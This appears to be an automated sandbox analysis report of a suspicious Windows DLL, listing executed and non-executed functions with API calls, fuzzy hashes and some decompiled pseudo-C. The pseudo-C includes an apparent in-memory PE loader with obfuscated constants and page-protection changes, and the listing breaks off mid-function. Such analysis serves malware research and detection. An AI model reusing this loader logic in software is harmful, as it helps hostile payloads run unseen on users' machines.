                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d12fe
                                                                                                                          0x6e2d12fe
                                                                                                                          0x6e2d12fe
                                                                                                                          0x6e2d1302
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d130e
                                                                                                                          0x6e2d1312
                                                                                                                          0x6e2d1336
                                                                                                                          0x6e2d133a
                                                                                                                          0x6e2d134e
                                                                                                                          0x6e2d134e
                                                                                                                          0x6e2d1354
                                                                                                                          0x6e2d1363
                                                                                                                          0x6e2d1367
                                                                                                                          0x6e2d136f
                                                                                                                          0x6e2d136f
                                                                                                                          0x6e2d1377
                                                                                                                          0x6e2d137a
                                                                                                                          0x6e2d1387
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d1387
                                                                                                                          0x6e2d1342
                                                                                                                          0x6e2d1346
                                                                                                                          0x6e2d134c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d134c
                                                                                                                          0x6e2d131a
                                                                                                                          0x6e2d131e
                                                                                                                          0x6e2d1328
                                                                                                                          0x6e2d1320
                                                                                                                          0x6e2d1320
                                                                                                                          0x6e2d1320
                                                                                                                          0x00000000
                                                                                                                          0x6e2d131e
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?), ref: 6E2D12EE
                                                                                                                          • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E2D1363
                                                                                                                          • GetLastError.KERNEL32 ref: 6E2D1369
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186146468.000000006E2D1000.00000020.00020000.sdmp, Offset: 6E2D0000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1186122026.000000006E2D0000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186170989.000000006E2D3000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186191044.000000006E2D5000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186206553.000000006E2D6000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: ProtectVirtual$ErrorLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1469625949-0
                                                                                                                          • Opcode ID: 5db7db25d9489e9105bb307e51715e2b7fda27e4daf57eeddaf26a306ad6d39b
                                                                                                                          • Instruction ID: a72ac4affa9c05e0484e27dc0132d9a6c6a19622dd337f8f5aeb376d90606c67
                                                                                                                          • Opcode Fuzzy Hash: 5db7db25d9489e9105bb307e51715e2b7fda27e4daf57eeddaf26a306ad6d39b
                                                                                                                          • Instruction Fuzzy Hash: 7321487191020AEFDB18CFC5C885AAAF7F9FB08355F414469E602D7809E3B4A6ACCB54
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E339A8C, Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E339835: GetOEMCP.KERNEL32(00000000,6E339AA7,?,00000000,6E3316B1,6E3316B1,00000000,00000000,?), ref: 6E339860
                                                                                                                          • _free.LIBCMT ref: 6E339B04
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: _free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 269201875-0
                                                                                                                          • Opcode ID: b67a27e9f83dd882bd523faf431f30bba01d41a1dc1dbde5e31d32497d4726de
                                                                                                                          • Instruction ID: 6d1d41a02826a5d33b3b224bd62e33fdbd92c7710db2ad08c445dab6007acf18
                                                                                                                          • Opcode Fuzzy Hash: b67a27e9f83dd882bd523faf431f30bba01d41a1dc1dbde5e31d32497d4726de
                                                                                                                          • Instruction Fuzzy Hash: 0D31D071904299EFDB01CFA8C880FDA7BF8EF44324F210569E9159B294EB76D951CB60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2D10B9, Relevance: 3.1, APIs: 2, Instructions: 59stringthreadCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E6E2D10B9() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				void* _t30;
				intOrPtr* _t32;
				signed int _t36;
				intOrPtr _t39;

				_t15 =  *0x6e2d41c4;
				if( *0x6e2d41ac > 5) {
					_t16 = _t15 + 0x6e2d50f9;
				} else {
					_t16 = _t15 + 0x6e2d50b1;
				}
				E6E2D15A0(_t16, _t16);
				_t36 = 6;
				memset( &_v32, 0, _t36 << 2);
				if(E6E2D1EF0( &_v32,  &_v16,  *0x6e2d41c0 ^ 0xf7a71548) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x6e2d41b8);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					_t30 = E6E2D1172(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t32 = _v36;
						 *_t32 = 0;
						if( *0x6e2d41b8 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							E6E2D2070(_t44, _t32 + 4);
						}
					}
					_t25 = E6E2D1015(_v28); // executed
				}
				ExitThread(_t25);
			}















                                                                                                                          0x6e2d10bf
                                                                                                                          0x6e2d10d0
                                                                                                                          0x6e2d10da
                                                                                                                          0x6e2d10d2
                                                                                                                          0x6e2d10d2
                                                                                                                          0x6e2d10d2
                                                                                                                          0x6e2d10e1
                                                                                                                          0x6e2d10ea
                                                                                                                          0x6e2d10ef
                                                                                                                          0x6e2d110d
                                                                                                                          0x6e2d1169
                                                                                                                          0x6e2d110f
                                                                                                                          0x6e2d1115
                                                                                                                          0x6e2d111b
                                                                                                                          0x6e2d1129
                                                                                                                          0x6e2d112d
                                                                                                                          0x6e2d1134
                                                                                                                          0x6e2d113d
                                                                                                                          0x6e2d1141
                                                                                                                          0x6e2d1147
                                                                                                                          0x6e2d1158
                                                                                                                          0x6e2d1149
                                                                                                                          0x6e2d114f
                                                                                                                          0x6e2d114f
                                                                                                                          0x6e2d1147
                                                                                                                          0x6e2d1160
                                                                                                                          0x6e2d1160
                                                                                                                          0x6e2d116b

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186146468.000000006E2D1000.00000020.00020000.sdmp, Offset: 6E2D0000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1186122026.000000006E2D0000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186170989.000000006E2D3000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186191044.000000006E2D5000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186206553.000000006E2D6000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: ExitThreadlstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2636182767-0
                                                                                                                          • Opcode ID: ccadd7b430c63fbbd483dd7b32e1667c754db78646b027bb9bf7d1d7424344b1
                                                                                                                          • Instruction ID: 2596f9e82765e37276ecfb95cf8e67a50a1d542956bb5802c19353e95d95a248
                                                                                                                          • Opcode Fuzzy Hash: ccadd7b430c63fbbd483dd7b32e1667c754db78646b027bb9bf7d1d7424344b1
                                                                                                                          • Instruction Fuzzy Hash: 2911BB7291860E9FEB01DBE4C808F8773EEAB06305F054916E751D3590E770E98DCB62
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E339BA5, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: _free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 269201875-0
                                                                                                                          • Opcode ID: 4227267b8f56f39bcf50c518fb592b0de5b71dc2ab05dd4841ca121ef92fc659
                                                                                                                          • Instruction ID: 6c95fc3a8c22f47045479db0f5abbb0b7f40996890c1a317c90a84c1e5850b44
                                                                                                                          • Opcode Fuzzy Hash: 4227267b8f56f39bcf50c518fb592b0de5b71dc2ab05dd4841ca121ef92fc659
                                                                                                                          • Instruction Fuzzy Hash: E521F271904A72DFCF109FE89440BD977A8FB05764F22454AE5A067B84CB76A441CFD4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E32F4F7, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 6E32F529
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1279760036-0
                                                                                                                          • Opcode ID: 059a3439ef541da27bf9ff72dc6a05d87b0fd0c5eb138cd233714bb174ba2cac
                                                                                                                          • Instruction ID: 40f7d613489286813aebbdd69064cfcfe09268a18891795286472e2083663017
                                                                                                                          • Opcode Fuzzy Hash: 059a3439ef541da27bf9ff72dc6a05d87b0fd0c5eb138cd233714bb174ba2cac
                                                                                                                          • Instruction Fuzzy Hash: B6E065216456235FEB511EFAAC14B9B367CBF427B4F3101749CD4F6298DB11D90282E0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F5C56, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • RtlEncodePointer.NTDLL(?), ref: 6E2F5C69
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: EncodePointer
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2118026453-0
                                                                                                                          • Opcode ID: 0ea5e33b30c0815d19cb1c81db660cef27284e855ba988fb774583ac02382796
                                                                                                                          • Instruction ID: 95a0dd9ea923f1d755e8c6bc88f0e504581320b50beece006e92090b248a883c
                                                                                                                          • Opcode Fuzzy Hash: 0ea5e33b30c0815d19cb1c81db660cef27284e855ba988fb774583ac02382796
                                                                                                                          • Instruction Fuzzy Hash: 7DD0C970008E24DFDF05AF54E8147A43BFCF706306F1004A8E40D83694DB319460CA4C
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2D15A0, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 37%
                                                                                                                          			E6E2D15A0(void* __eax, intOrPtr _a4) {

				 *0x6e2d41d0 =  *0x6e2d41d0 & 0x00000000;
				_push(0);
				_push(0x6e2d41cc);
				_push(1);
				_push(_a4);
				 *0x6e2d41c8 = 0xc; // executed
				L6E2D1764(); // executed
				return __eax;
			}



                                                                                                                          0x6e2d15a0
                                                                                                                          0x6e2d15a7
                                                                                                                          0x6e2d15a9
                                                                                                                          0x6e2d15ae
                                                                                                                          0x6e2d15b0
                                                                                                                          0x6e2d15b4
                                                                                                                          0x6e2d15be
                                                                                                                          0x6e2d15c3

                                                                                                                          APIs
                                                                                                                          • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(6E2D10E6,00000001,6E2D41CC,00000000), ref: 6E2D15BE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186146468.000000006E2D1000.00000020.00020000.sdmp, Offset: 6E2D0000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1186122026.000000006E2D0000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186170989.000000006E2D3000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186191044.000000006E2D5000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186206553.000000006E2D6000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: DescriptorSecurity$ConvertString
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3907675253-0
                                                                                                                          • Opcode ID: 68a70b38fd1edbfdcee41385ba7ad83c192b4fc4d9cdc5293a08b14012fed485
                                                                                                                          • Instruction ID: 097a78535d015a8a7c0e63b303de5712dfae92021c4f9e63c799575b1ebc2845
                                                                                                                          • Opcode Fuzzy Hash: 68a70b38fd1edbfdcee41385ba7ad83c192b4fc4d9cdc5293a08b14012fed485
                                                                                                                          • Instruction Fuzzy Hash: DBC09BB4540745A7FB509F80CC49F45BA53777171DF140604F740251D1C3F5915DD939
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2D1015, Relevance: 1.3, APIs: 1, Instructions: 70COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 86%
                                                                                                                          			E6E2D1015(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x6e2d41c0;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e2d41c0 - 0x69b24f45 &  !( *0x6e2d41c0 - 0x69b24f45);
				_t18 = E6E2D19C2( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e2d41c0 - 0x69b24f45 &  !( *0x6e2d41c0 - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e2d41c0 - 0x69b24f45 &  !( *0x6e2d41c0 - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E6E2D1798(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E6E2D1DE5(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E6E2D12B5(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E6E2D1397(_t42);
					L8:
					return _t29;
				}
			}














                                                                                                                          0x6e2d101d
                                                                                                                          0x6e2d101f
                                                                                                                          0x6e2d103b
                                                                                                                          0x6e2d104c
                                                                                                                          0x6e2d1053
                                                                                                                          0x6e2d10b1
                                                                                                                          0x00000000
                                                                                                                          0x6e2d1055
                                                                                                                          0x6e2d1055
                                                                                                                          0x6e2d105f
                                                                                                                          0x6e2d1063
                                                                                                                          0x6e2d1068
                                                                                                                          0x6e2d106b
                                                                                                                          0x6e2d1070
                                                                                                                          0x6e2d1074
                                                                                                                          0x6e2d1079
                                                                                                                          0x6e2d107e
                                                                                                                          0x6e2d1082
                                                                                                                          0x6e2d1087
                                                                                                                          0x6e2d1088
                                                                                                                          0x6e2d108c
                                                                                                                          0x6e2d1091
                                                                                                                          0x6e2d1099
                                                                                                                          0x6e2d1099
                                                                                                                          0x6e2d1091
                                                                                                                          0x6e2d1082
                                                                                                                          0x6e2d1074
                                                                                                                          0x6e2d109b
                                                                                                                          0x6e2d10a4
                                                                                                                          0x6e2d10a8
                                                                                                                          0x6e2d10b2
                                                                                                                          0x6e2d10b8
                                                                                                                          0x6e2d10b8

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E2D19C2: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6E2D1051,?,?,?,?), ref: 6E2D19E6
                                                                                                                            • Part of subcall function 6E2D19C2: GetProcAddress.KERNEL32(00000000,?), ref: 6E2D1A08
                                                                                                                            • Part of subcall function 6E2D19C2: GetProcAddress.KERNEL32(00000000,?), ref: 6E2D1A1E
                                                                                                                            • Part of subcall function 6E2D19C2: GetProcAddress.KERNEL32(00000000,?), ref: 6E2D1A34
                                                                                                                            • Part of subcall function 6E2D19C2: GetProcAddress.KERNEL32(00000000,?), ref: 6E2D1A4A
                                                                                                                            • Part of subcall function 6E2D19C2: GetProcAddress.KERNEL32(00000000,?), ref: 6E2D1A60
                                                                                                                            • Part of subcall function 6E2D1798: memcpy.NTDLL(?,?,?,?,?,?,?,?,6E2D105F,?,?,?,?,?,?), ref: 6E2D17CF
                                                                                                                            • Part of subcall function 6E2D1798: memcpy.NTDLL(?,?,?), ref: 6E2D1804
                                                                                                                            • Part of subcall function 6E2D1DE5: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6E2D1E1D
                                                                                                                            • Part of subcall function 6E2D12B5: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?), ref: 6E2D12EE
                                                                                                                            • Part of subcall function 6E2D12B5: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E2D1363
                                                                                                                            • Part of subcall function 6E2D12B5: GetLastError.KERNEL32 ref: 6E2D1369
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?), ref: 6E2D1093
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186146468.000000006E2D1000.00000020.00020000.sdmp, Offset: 6E2D0000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1186122026.000000006E2D0000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186170989.000000006E2D3000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186191044.000000006E2D5000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.1186206553.000000006E2D6000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2673762927-0
                                                                                                                          • Opcode ID: 10e666ebeff33ea565ce8ce51391aa49573e024872cd00e51ec84b24c686c872
                                                                                                                          • Instruction ID: 75a27e7b70b8f5e018db08416b724f5030785f2c421fc4348afe3a2f2087dd17
                                                                                                                          • Opcode Fuzzy Hash: 10e666ebeff33ea565ce8ce51391aa49573e024872cd00e51ec84b24c686c872
                                                                                                                          • Instruction Fuzzy Hash: 0B110B3A60070EABD311AAE5CC94DEF77BEAF893157040569EF0297904DBA1ED4D8790
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Non-executed Functions

                                                                                                                          Function 6E33E84C, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 85COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,j3n,00000002,00000000,?,?,?,6E33EB6A,?,00000000), ref: 6E33E8E5
                                                                                                                          • GetLocaleInfoW.KERNEL32(?,20001004,j3n,00000002,00000000,?,?,?,6E33EB6A,?,00000000), ref: 6E33E90E
                                                                                                                          • GetACP.KERNEL32(?,?,6E33EB6A,?,00000000), ref: 6E33E923
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: InfoLocale
                                                                                                                          • String ID: ACP$OCP$j3n
                                                                                                                          • API String ID: 2299586839-873717512
                                                                                                                          • Opcode ID: 7d1e1cd62d4062a7df91a4d735e80c6ac72ab922e6a5d314a8c008c26ee852c3
                                                                                                                          • Instruction ID: dd5cc24ca46b0ec31309cf6b682a2c846e1443720e4c8b4881d6f976a33c679b
                                                                                                                          • Opcode Fuzzy Hash: 7d1e1cd62d4062a7df91a4d735e80c6ac72ab922e6a5d314a8c008c26ee852c3
                                                                                                                          • Instruction Fuzzy Hash: 5821E226E043A5EAE7A48BEBC901F9B77ABAF45F50B628420E905DF504E733DD40C390
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E32FF15, Relevance: 7.9, APIs: 5, Instructions: 373timeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$InformationTimeZone
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 597776487-0
                                                                                                                          • Opcode ID: ff3225bbef2e3f9407d032b2588eb42d37e890e5548076618b4d90d8ef317457
                                                                                                                          • Instruction ID: 2d1502a18f084dc6ed38b25d9cc42c41200cd3cfda5e2ef50d5068226a2d90f6
                                                                                                                          • Opcode Fuzzy Hash: ff3225bbef2e3f9407d032b2588eb42d37e890e5548076618b4d90d8ef317457
                                                                                                                          • Instruction Fuzzy Hash: 57C117719042A5AFDB109FF8D850FEA7BBDAF46358F3445A9D4D0E7281E7328A42CB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E33E0A2, Relevance: 7.8, APIs: 5, Instructions: 251COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E32F299: GetLastError.KERNEL32(00000000,00000000,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000,00000004), ref: 6E32F29E
                                                                                                                            • Part of subcall function 6E32F299: SetLastError.KERNEL32(00000000,6E37A1A0,000000FF,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000), ref: 6E32F33C
                                                                                                                          • GetACP.KERNEL32(?,?,?,?,?,?,6E3325B5,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 6E33E163
                                                                                                                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6E3325B5,?,?,?,00000055,?,-00000050,?,?), ref: 6E33E18E
                                                                                                                          • _wcschr.LIBVCRUNTIME ref: 6E33E222
                                                                                                                          • _wcschr.LIBVCRUNTIME ref: 6E33E230
                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6E33E2F1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4147378913-0
                                                                                                                          • Opcode ID: 90e1432405cd92aa9c9e7d0a5b6c36d61da55a424b733a30f54be4847cb0fe27
                                                                                                                          • Instruction ID: d4111a5a416444278168e6b8cfc21d73982251dc2f7ef529f70c44144017b726
                                                                                                                          • Opcode Fuzzy Hash: 90e1432405cd92aa9c9e7d0a5b6c36d61da55a424b733a30f54be4847cb0fe27
                                                                                                                          • Instruction Fuzzy Hash: 66711871A00362AAEB65ABF6CC45FA773ACEF45314F30082AE555DB180EB71EC408B61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E33EA21, Relevance: 7.7, APIs: 5, Instructions: 183COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E32F299: GetLastError.KERNEL32(00000000,00000000,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000,00000004), ref: 6E32F29E
                                                                                                                            • Part of subcall function 6E32F299: SetLastError.KERNEL32(00000000,6E37A1A0,000000FF,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000), ref: 6E32F33C
                                                                                                                            • Part of subcall function 6E32F299: _free.LIBCMT ref: 6E32F2FB
                                                                                                                            • Part of subcall function 6E32F299: _free.LIBCMT ref: 6E32F331
                                                                                                                          • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 6E33EB2D
                                                                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 6E33EB76
                                                                                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 6E33EB85
                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6E33EBCD
                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6E33EBEC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 949163717-0
                                                                                                                          • Opcode ID: 5b9609fdfdb29309dda328721904905794aa73cbe5b363baa38e552c1537ebe1
                                                                                                                          • Instruction ID: afe904202404c1a6e8cf5ed636a877968029fcc17d3d7c6afc9698b2e0a81371
                                                                                                                          • Opcode Fuzzy Hash: 5b9609fdfdb29309dda328721904905794aa73cbe5b363baa38e552c1537ebe1
                                                                                                                          • Instruction Fuzzy Hash: D7516E72A0436A9AEF51DFE6CC44EAE77BCBF05700F24046AE551EB180DB719D40CB61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2D23D5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 195nativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E6E2D23D5(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x6e2d41f8;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x6e2d4240 = 1;
										__eflags =  *0x6e2d4240;
										if( *0x6e2d4240 != 0) {
											goto L60;
										}
										_t84 =  *0x6e2d41f8;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x6e2d4240 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
